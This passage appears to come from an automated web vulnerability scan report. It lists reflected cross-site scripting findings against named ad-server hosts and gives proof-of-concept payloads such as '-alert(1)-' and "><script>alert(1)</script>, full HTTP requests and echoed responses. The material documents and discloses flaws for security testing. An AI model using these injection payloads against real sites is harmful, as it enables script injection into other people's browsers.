Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.msnbc.msn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Tue, 22 Mar 2011 21:12:10 GMT
Vary: Accept-Encoding
Expires: Tue, 22 Mar 2011 21:12:10 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5266

document.write('<!-- Template Id = 2,594 Template Name = Banner Creative (Flash) - In Page Multiples -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.ne
...[SNIP]...
6;
var FWH = ' width="300" height="105" ';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/24000000000030802.1?!&&PID=8134962&UIT=G&TargetID=21241065&AN=403718616&PG=NBCRM4e83a9"-alert(1)-"0a5f61e11f5&ASID=d146d593dd1041c7b5045855d4810637&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3ad2/17/db/%2a/c%3B233941882%3B0-0%3B0%3B57845090%3B18058-300/105%3B34491606/34509484/1%3B%3B%7Esscs%3D%3fhtt
...[SNIP]...

1.35. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [TargetID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4492.MSN/B5014254.46

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9b412'-alert(1)-'da64d3f3254 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N4492.MSN/B5014254.46;sz=300x105;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/24000000000030802.1?!&&PID=8134962&UIT=G&TargetID=212410659b412'-alert(1)-'da64d3f3254&AN=403718616&PG=NBCRM4&ASID=d146d593dd1041c7b5045855d4810637&destination=;ord=403718616? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.msnbc.msn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Tue, 22 Mar 2011 21:11:56 GMT
Vary: Accept-Encoding
Expires: Tue, 22 Mar 2011 21:11:56 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5266

document.write('<!-- Template Id = 2,594 Template Name = Banner Creative (Flash) - In Page Multiples -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.ne
...[SNIP]...
<a target=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/24000000000030802.1?!&&PID=8134962&UIT=G&TargetID=212410659b412'-alert(1)-'da64d3f3254&AN=403718616&PG=NBCRM4&ASID=d146d593dd1041c7b5045855d4810637&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3ad2/17/db/%2a/c%3B233941882%3B0-0%3B0%3B57845090%3B18058-300/105%3B34491606/34509484/
...[SNIP]...

1.36. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [TargetID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4492.MSN/B5014254.46

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f178a"-alert(1)-"4c9e8c1a947 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N4492.MSN/B5014254.46;sz=300x105;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/24000000000030802.1?!&&PID=8134962&UIT=G&TargetID=21241065f178a"-alert(1)-"4c9e8c1a947&AN=403718616&PG=NBCRM4&ASID=d146d593dd1041c7b5045855d4810637&destination=;ord=403718616? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.msnbc.msn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Tue, 22 Mar 2011 21:11:52 GMT
Vary: Accept-Encoding
Expires: Tue, 22 Mar 2011 21:11:52 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5266

document.write('<!-- Template Id = 2,594 Template Name = Banner Creative (Flash) - In Page Multiples -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.ne
...[SNIP]...
0x105.gif";
var minV = 6;
var FWH = ' width="300" height="105" ';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/24000000000030802.1?!&&PID=8134962&UIT=G&TargetID=21241065f178a"-alert(1)-"4c9e8c1a947&AN=403718616&PG=NBCRM4&ASID=d146d593dd1041c7b5045855d4810637&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3ad2/17/db/%2a/c%3B233941882%3B0-0%3B0%3B57845090%3B18058-300/105%3B34491606/34509484/
...[SNIP]...

1.37. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [UIT parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4492.MSN/B5014254.46

Issue detail

The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3968c'-alert(1)-'1506c597196 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N4492.MSN/B5014254.46;sz=300x105;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/24000000000030802.1?!&&PID=8134962&UIT=G3968c'-alert(1)-'1506c597196&TargetID=21241065&AN=403718616&PG=NBCRM4&ASID=d146d593dd1041c7b5045855d4810637&destination=;ord=403718616? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.msnbc.msn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Tue, 22 Mar 2011 21:11:47 GMT
Vary: Accept-Encoding
Expires: Tue, 22 Mar 2011 21:11:47 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5266

document.write('<!-- Template Id = 2,594 Template Name = Banner Creative (Flash) - In Page Multiples -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.ne
...[SNIP]...
<a target=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/24000000000030802.1?!&&PID=8134962&UIT=G3968c'-alert(1)-'1506c597196&TargetID=21241065&AN=403718616&PG=NBCRM4&ASID=d146d593dd1041c7b5045855d4810637&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3ad2/17/db/%2a/c%3B233941882%3B0-0%3B0%3B57845090%3B18058-300/105%3B
...[SNIP]...

1.38. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [UIT parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4492.MSN/B5014254.46

Issue detail

The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5f338"-alert(1)-"a50b7643689 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N4492.MSN/B5014254.46;sz=300x105;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/24000000000030802.1?!&&PID=8134962&UIT=G5f338"-alert(1)-"a50b7643689&TargetID=21241065&AN=403718616&PG=NBCRM4&ASID=d146d593dd1041c7b5045855d4810637&destination=;ord=403718616? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.msnbc.msn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Tue, 22 Mar 2011 21:11:43 GMT
Vary: Accept-Encoding
Expires: Tue, 22 Mar 2011 21:11:43 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5266

document.write('<!-- Template Id = 2,594 Template Name = Banner Creative (Flash) - In Page Multiples -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.ne
...[SNIP]...
flo_interactive_300x105.gif";
var minV = 6;
var FWH = ' width="300" height="105" ';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/24000000000030802.1?!&&PID=8134962&UIT=G5f338"-alert(1)-"a50b7643689&TargetID=21241065&AN=403718616&PG=NBCRM4&ASID=d146d593dd1041c7b5045855d4810637&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3ad2/17/db/%2a/c%3B233941882%3B0-0%3B0%3B57845090%3B18058-300/105%3B
...[SNIP]...

1.39. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [destination parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4492.MSN/B5014254.46

Issue detail

The value of the destination request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e8037'-alert(1)-'eebfd7f9b8f was submitted in the destination parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N4492.MSN/B5014254.46;sz=300x105;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/24000000000030802.1?!&&PID=8134962&UIT=G&TargetID=21241065&AN=403718616&PG=NBCRM4&ASID=d146d593dd1041c7b5045855d4810637&destination=e8037'-alert(1)-'eebfd7f9b8f HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.msnbc.msn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5266
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 22 Mar 2011 21:12:49 GMT
Expires: Tue, 22 Mar 2011 21:12:49 GMT

document.write('<!-- Template Id = 2,594 Template Name = Banner Creative (Flash) - In Page Multiples -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.ne
...[SNIP]...
\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/24000000000030802.1?!&&PID=8134962&UIT=G&TargetID=21241065&AN=403718616&PG=NBCRM4&ASID=d146d593dd1041c7b5045855d4810637&destination=e8037'-alert(1)-'eebfd7f9b8fhttp://ad.doubleclick.net/click%3Bh%3Dv8/3ad2/17/db/%2a/c%3B233941882%3B0-0%3B0%3B57845090%3B18058-300/105%3B34491606/34509484/1%3B%3B%7Esscs%3D%3fhttp://www.progressive.com/insurance/cre/display.aspx?
...[SNIP]...

1.40. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [destination parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4492.MSN/B5014254.46

Issue detail

The value of the destination request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e7c4f"-alert(1)-"5711941fc4a was submitted in the destination parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N4492.MSN/B5014254.46;sz=300x105;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/24000000000030802.1?!&&PID=8134962&UIT=G&TargetID=21241065&AN=403718616&PG=NBCRM4&ASID=d146d593dd1041c7b5045855d4810637&destination=e7c4f"-alert(1)-"5711941fc4a HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.msnbc.msn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5266
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 22 Mar 2011 21:12:42 GMT
Expires: Tue, 22 Mar 2011 21:12:42 GMT

document.write('<!-- Template Id = 2,594 Template Name = Banner Creative (Flash) - In Page Multiples -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.ne
...[SNIP]...
= escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/24000000000030802.1?!&&PID=8134962&UIT=G&TargetID=21241065&AN=403718616&PG=NBCRM4&ASID=d146d593dd1041c7b5045855d4810637&destination=e7c4f"-alert(1)-"5711941fc4ahttp://ad.doubleclick.net/click%3Bh%3Dv8/3ad2/17/db/%2a/c%3B233941882%3B0-0%3B0%3B57845090%3B18058-300/105%3B34491606/34509484/1%3B%3B%7Esscs%3D%3fhttp://www.progressive.com/insurance/cre/display.aspx?
...[SNIP]...

1.41. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4492.MSN/B5014254.46

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 89d06"-alert(1)-"0e46aef3005 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N4492.MSN/B5014254.46;sz=300x105;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/24000000000030802.1?!89d06"-alert(1)-"0e46aef3005&&PID=8134962&UIT=G&TargetID=21241065&AN=403718616&PG=NBCRM4&ASID=d146d593dd1041c7b5045855d4810637&destination=;ord=403718616? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.msnbc.msn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Tue, 22 Mar 2011 21:11:26 GMT
Vary: Accept-Encoding
Expires: Tue, 22 Mar 2011 21:11:26 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5266

document.write('<!-- Template Id = 2,594 Template Name = Banner Creative (Flash) - In Page Multiples -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.ne
...[SNIP]...
meyourprice_slider_flo_interactive_300x105.gif";
var minV = 6;
var FWH = ' width="300" height="105" ';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/24000000000030802.1?!89d06"-alert(1)-"0e46aef3005&&PID=8134962&UIT=G&TargetID=21241065&AN=403718616&PG=NBCRM4&ASID=d146d593dd1041c7b5045855d4810637&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3ad2/17/db/%2a/c%3B233941882%3B0-0%3B0%3B57845090
...[SNIP]...

1.42. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.46 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4492.MSN/B5014254.46

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8e16a'-alert(1)-'93e31e9e62d was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N4492.MSN/B5014254.46;sz=300x105;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/24000000000030802.1?!8e16a'-alert(1)-'93e31e9e62d&&PID=8134962&UIT=G&TargetID=21241065&AN=403718616&PG=NBCRM4&ASID=d146d593dd1041c7b5045855d4810637&destination=;ord=403718616? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.msnbc.msn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Tue, 22 Mar 2011 21:11:30 GMT
Vary: Accept-Encoding
Expires: Tue, 22 Mar 2011 21:11:30 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5266

document.write('<!-- Template Id = 2,594 Template Name = Banner Creative (Flash) - In Page Multiples -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.ne
...[SNIP]...
<a target=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003K/24000000000030802.1?!8e16a'-alert(1)-'93e31e9e62d&&PID=8134962&UIT=G&TargetID=21241065&AN=403718616&PG=NBCRM4&ASID=d146d593dd1041c7b5045855d4810637&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3ad2/17/db/%2a/c%3B233941882%3B0-0%3B0%3B57845090
...[SNIP]...

1.43. http://ad.turn.com/server/pixel.htm [fpid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab508"><script>alert(1)</script>f28986d6202 was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=ab508"><script>alert(1)</script>f28986d6202 HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/tips
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=QYdf8pQ322SIyBI2iUoAU4RjEWhnHVjNlGGMhSRuUKth-L3XcPmT4hHXOQgApIlYHYX4_NcWdx3_ane6F4B-14GhJc02ow2AtUwL6WPia2FGaLnf0zlcY_NlRLgfVWu_p2dXRupylG3NYnZS5bXKYP96WiAgIoOXEFUWrzhKF5gCw-urpRf-_9YebSTVOgNrqPihsYENeO8sXA9lvbRdayfMZtqW06LRo26dh_6mdAGJGTELtL4GqGulFNiuT83_JW8PFWxYJ1q2_24dlRk_ah5icQ-UlIA9kPFGJHuyqaq5VL3rxbStQ7qJq0UYbCEIsUtODQcKNwexAxOYVwN1nK5X96dOre3quYO9Z-8ufvZDTyl_SWg8JF85Vro55plfoTgVQZo2IE3aGhkEGjHTkTFiBYl1Y5wme5TkSr2cG_wgfqVSXeBNVe3tcWgG-cKlb6X9zJjlpwSm9YUJH9a4gJTCk-tuxUia_8m_xGP0ng-vamqLuW_YXqfv_SJ_aE8WewT_9aYmy1_kglD2-j2O9xEN2WSuwULQaF3F5bjuxzhmEuJsfxP5f1y2CMVwcPBKjitRrpYhjNWTpkhfFGNz1pMs9g0Q0vhgJiFRvR8WD6y1byxKhk0zupa7mhXtOt59TSvsYEqhZ0OHSuNp70BrBPgFZPUXsLmq7zd2bgatqFEtgpfxqN_T7QEW7hJnuqjPvjaUahkeh2AIOXYNj81E2z9CvciRuIEJCv8yxQ13OGBfB4P3wQx6U2WiVVEP-_Y7EOaV0vIfQZsAGrAD9lknuVDiL3nhapvU0GeEL2HT-L8OVgkB2bwToPK0KdNC16-jTfAO5O3oP_bfifepQZJrTx5icQ-UlIA9kPFGJHuyqarB6alCNElibRNjAQJxQ3wScEcZhGdHz3dGIuUYDCisolLji3VTL1tjXfqm-esg2sewf4n0X2poBn_JF16R7_JpoTgVQZo2IE3aGhkEGjHTkeeFQfumNuZsM8qSWC1YO88e0aAoBCNnU0MrQhAnhIPCOUygdo-nXLnZpGMXrI7zLHABVz72fi9fhT0whWU6oVuvamqLuW_YXqfv_SJ_aE8WghrAn-Vi2vPEwMGFNlZbYxEN2WSuwULQaF3F5bjuxzh7HBG162ww7piqD1aguph5yjHL13DurDt14-jGkVE335Ms9g0Q0vhgJiFRvR8WD6ypA0SKEqBppDDJhLx8qKy9TSvsYEqhZ0OHSuNp70BrBFPAk0ENEI9AkFKrpbmzGs3jQ_DNJLeHeL0m2Znba1buvjaUahkeh2AIOXYNj81E2-JjZ5NuKJfCva75n_nDp_hfB4P3wQx6U2WiVVEP-_Y7anyk5GyGEYfAPBsxHQjGZSlxmSbeaAgfibEHTq6nsWGJGTELtL4GqGulFNiuT83_aWjrAVXVlG7OWMAFleaNmJbd5mJVeqDBeYockQCeOAxxDWE5tfMM7qZbrjn2eVJNHmJxD5SUgD2Q8UYke7KpqkQLRuw_4qwIZ0RgbwcKb_zPkrK-DNPDU2d6IfOlnKh298JoqNIrcIOFh27SKktj64bitenuXABFvYGLN_FjpjihOBVBmjYgTdoaGQQaMdORRSUpCyAfviw4AHYe3ZFe1j_H39CNFZoidFAH_Wwsr2KYkmu9Efz59RTTwRXe0-z-VzZOXR8fEEZYabQJ5OvIrK9qaou5b9hep-_9In9oTxYDFxyCqW2pHLJpyn6DipzREQ3ZZK7BQtBoXcXluO7HOHYn_JVSl2TRope3S5e7WdCOJuOFdBL4jJzlrGgOb4HBkyz2DRDS-GAmIVG9HxYPrCWrE7nz-KJuRo7xf7_4TaxNK-xgSqFnQ4dK42nvQGsE6ABEyeT6GgYO9T7bPr2uOIHF81yXCYglNgztjlxXYaK-NpRqGR6HYAg5dg2PzUTbalw8lqs5Yl_9jBwMs9Tj-V8Hg_fBDHpTZaJVUQ_79jtEExTCNts46MM726dOHk03EHP-IMF08vrzIT3Bb7Svo5bd5mJVeqDBeYockQCeOAxOo3HTnz6UEXwFhetL-lkMHmJxD5SUgD2Q8UYke7KpqjCzTD1GHFKXcyzidRcl9QVgKfB9VVbr4TUFv2p7bOInOewUt5gP_VlI1Ump9cof8bgUMqrglLkQZ2MmUdI_wRihOBVBmjYgTdoaGQQaMdORXsA1mfR2ULXMKrWuUdGM7RySCcjLsN_cxeO5d6Ll7ah1ym-8DGu-cUq_NzKN12epXgVQXjOJNmBQaMF-8bSNxK9qaou5b9hep-_9In9oTxbS-ghZdhmAasmF69aaImA6EQ3ZZK7BQtBoXcXluO7HOMQfuZ4AWvTJ-mwSNztcWshzAqXI_s6r0eNAoWe_e9VLkyz2DRDS-GAmIVG9HxYPrH5VjA_u5FxGvMqUnf9TQBxNK-xgSqFnQ4dK42nvQGsEmI9YI0NszyrnjSHCBrHOF7N0yDfDXTWmk3YZuned4J1zHpbFxYCHf8ECnS552zQGcx6WxcWAh3_BAp0ueds0BnMelsXFgId_wQKdLnnbNAZzHpbFxYCHf8ECnS552zQGcx6WxcWAh3_BAp0ueds0BitnssvNEea-CDLDeF-fwACvWXqvkkof0pdy12XNR71Ur1l6r5JKH9KXctdlzUe9VK9Zeq-SSh_Sl3LXZc1HvVSvWXqvkkof0pdy12XNR71UF-e0dAu4qNmsK2oR2A9RUQVMCl8aLbGecDd_fKt7NywFTApfGi2xnnA3f3yrezcsBUwKXxotsZ5wN398q3s3LAYbc69DjOHmwnxze8q4bqJPPYJ8usI-1hBBRr5uFxgFqfvBa32ACLSnDYXKF1oBeqn7wWt9gAi0pw2FyhdaAXqp-8FrfYAItKcNhcoXWgF6qfvBa32ACLSnDYXKF1oBeqn7wWt9gAi0pw2FyhdaAXryDt3w8cVNrM49PHXxiClIeDq2PHxBb0G93bZOUEV_B3g6tjx8QW9Bvd22TlBFfwd4OrY8fEFvQb3dtk5QRX8HeDq2PHxBb0G93bZOUEV_B34IJwkHmIrESNkEHZ8g1949RfOkpegw2OWd5Gq1X3SAPUXzpKXoMNjlneRqtV90gD1F86Sl6DDY5Z3karVfdIDVzbApqLD2dXriygnNopblFch-eoCuDk8x64052zPt2RXIfnqArg5PMeuNOdsz7dkVyH56gK4OTzHrjTnbM-3ZFch-eoCuDk8x64052zPt2RXIfnqArg5PMeuNOdsz7dkVyH56gK4OTzHrjTnbM-3ZE1zi3eUCecg106GXWo6ZhRNc4t3lAnnINdOhl1qOmYUTXOLd5QJ5yDXToZdajpmFE1zi3eUCecg106GXWo6ZhfPSjW7H5Jkol9-9LsOFip_z0o1ux-SZKJffvS7DhYqf89KNbsfkmSiX370uw4WKn5tSaxPmfiTgjAFYfvIlraaZa6cUR-KH2UMf-39oRIqSmWunFEfih9lDH_t_aESKkiaPGMMoWG79KMJG1_6B63rd33erOmBTEWjk8EHWq8r_3d93qzpgUxFo5PBB1qvK_33J5TXdC2nyuG8O3c